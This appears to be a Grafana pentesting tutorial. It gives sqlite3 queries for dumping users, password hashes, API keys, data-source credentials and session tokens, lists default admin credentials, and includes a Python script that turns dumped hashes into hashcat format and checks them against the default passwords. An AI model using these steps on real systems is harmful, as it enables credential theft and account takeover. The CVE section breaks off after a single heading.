
Pentesting Grafana

Source: https://rootxsushant.medium.com/a-comprehensive-guide-for-pentesting-grafana-cfa09b2f1243

Grafana is an open source interactive data-visualization platform, developed by Grafana Labs, which allows users to see their data via charts and graphs that are unified into one dashboard (or multiple dashboards!) for easier interpretation and understanding. You can also query and set alerts on your information and metrics from wherever that information is stored, whether that’s traditional server environments, Kubernetes clusters, or various cloud services, etc.

Important Grafana files and directories

/var/lib/grafana/grafana.db   -- SQLite database: users (with password hashes and salts), sessions, API keys, data sources
/etc/grafana/grafana.ini      -- main configuration: [security] admin_user/admin_password, and the secret_key used to encrypt stored data-source secrets

grafana.db

Copy the file to your local machine; it is a plain SQLite database, so no credentials are needed to read it once you have the file.

If you have SQLite installed, just run:

sqlite3 grafana.db

Once inside the shell:

.tables             -- list all tables
.schema             -- print schema
SELECT * FROM user;         -- dump all users (login, email, PBKDF2 password hash, salt, is_admin)
SELECT * FROM api_key;      -- list API keys
SELECT * FROM data_source;  -- view data sources (often contains creds)
SELECT * FROM user_auth_token; -- session tokens

Default Credentials

Grafana, like many other platforms, ships with preset login credentials that administrators often forget to change. admin:admin is the stock default; admin:prom-operator is the default set by the kube-prometheus-stack Helm chart.

admin:admin
admin:prom-operator

Tools

grafana2hashcat (converts the password/salt pairs dumped from the user table into hashcat mode 10900, PBKDF2-HMAC-SHA256, format): Original | My fork
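The grafana.db dump, the default-credential check and the grafana2hashcat conversion above fit together in one offline workflow. The script below is an added example written for this page, not code from the original article or from grafana2hashcat. It reproduces Grafana's password hashing (hex-encoded PBKDF2-HMAC-SHA256, 10000 iterations, 50-byte output, as in Grafana's EncodePassword), reads login/password/salt from the user table, emits hashcat 10900 lines, and first tries the two default passwords against every hash so you do not burn GPU time on accounts that were never rotated. The database it opens is a constructed in-memory stand-in with only the columns the script reads; the logins, salts and plaintexts in it are made up. Point build_sample_db() at a copied grafana.db with sqlite3.connect("grafana.db") for real use.

```python
import base64
import hashlib
import hmac
import sqlite3

# Grafana stores passwords as hex(PBKDF2-HMAC-SHA256(password, salt, 10000 rounds, 50-byte output)).
PBKDF2_ITERATIONS = 10000
PBKDF2_DKLEN = 50

# The two defaults named on this page; extend with site-specific guesses if you have them.
DEFAULT_PASSWORDS = ("admin", "prom-operator")


def grafana_hash(password: str, salt: str) -> str:
    """Reproduce Grafana's EncodePassword(): hex of PBKDF2-HMAC-SHA256, 10000 rounds, 50 bytes."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(),
                                 PBKDF2_ITERATIONS, PBKDF2_DKLEN)
    return digest.hex()


def to_hashcat_10900(password_hex: str, salt: str) -> str:
    """Build a hashcat -m 10900 line: sha256:<iterations>:<base64(salt)>:<base64(raw hash)>."""
    salt_b64 = base64.b64encode(salt.encode()).decode()
    hash_b64 = base64.b64encode(bytes.fromhex(password_hex)).decode()
    return f"sha256:{PBKDF2_ITERATIONS}:{salt_b64}:{hash_b64}"


def dump_users(conn: sqlite3.Connection) -> list:
    """Pull login, email, stored hash, salt and admin flag from the `user` table."""
    rows = conn.execute("SELECT login, email, password, salt, is_admin FROM user").fetchall()
    return [{"login": r[0], "email": r[1], "password": r[2], "salt": r[3], "is_admin": bool(r[4])}
            for r in rows]


def check_defaults(users: list, candidates=DEFAULT_PASSWORDS) -> dict:
    """Map login -> default password for every account whose hash matches a candidate."""
    hits = {}
    for u in users:
        for cand in candidates:
            # constant-time compare of the two hex strings
            if hmac.compare_digest(grafana_hash(cand, u["salt"]), u["password"]):
                hits[u["login"]] = cand
                break
    return hits


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for /var/lib/grafana/grafana.db (hypothetical rows, reduced schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE user (
        id INTEGER PRIMARY KEY, login TEXT, email TEXT, password TEXT, salt TEXT, is_admin INTEGER)""")
    sample = [
        # login, email, plaintext (only used to seed the hash), 8-char salt, is_admin
        ("admin", "admin@localhost", "admin", "4iphoqhv", 1),          # default never rotated
        ("alice", "alice@example.org", "S3cr3t-Metrics!", "z1x2c3v4", 0),
    ]
    for login, email, plain, salt, is_admin in sample:
        conn.execute("INSERT INTO user (login, email, password, salt, is_admin) VALUES (?,?,?,?,?)",
                     (login, email, grafana_hash(plain, salt), salt, is_admin))
    conn.commit()
    return conn


def main() -> None:
    conn = build_sample_db()  # real use: sqlite3.connect("grafana.db") on the copied file
    users = dump_users(conn)
    for u in users:
        flag = " (admin)" if u["is_admin"] else ""
        print(f"{u['login']}{flag}:{to_hashcat_10900(u['password'], u['salt'])}")
    for login, pw in check_defaults(users).items():
        print(f"[!] {login} still uses default password {pw!r}")


if __name__ == "__main__":
    main()
```

Feed the printed hashcat lines (minus the login prefix) to hashcat -m 10900 for anything check_defaults did not catch; the username:hash form is kept only so you can map cracked hashes back to accounts with --username.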

Well-known CVEs

CVE-2020-13379:

Last update: 2025-12-14
Created: July 14, 2025 16:39:18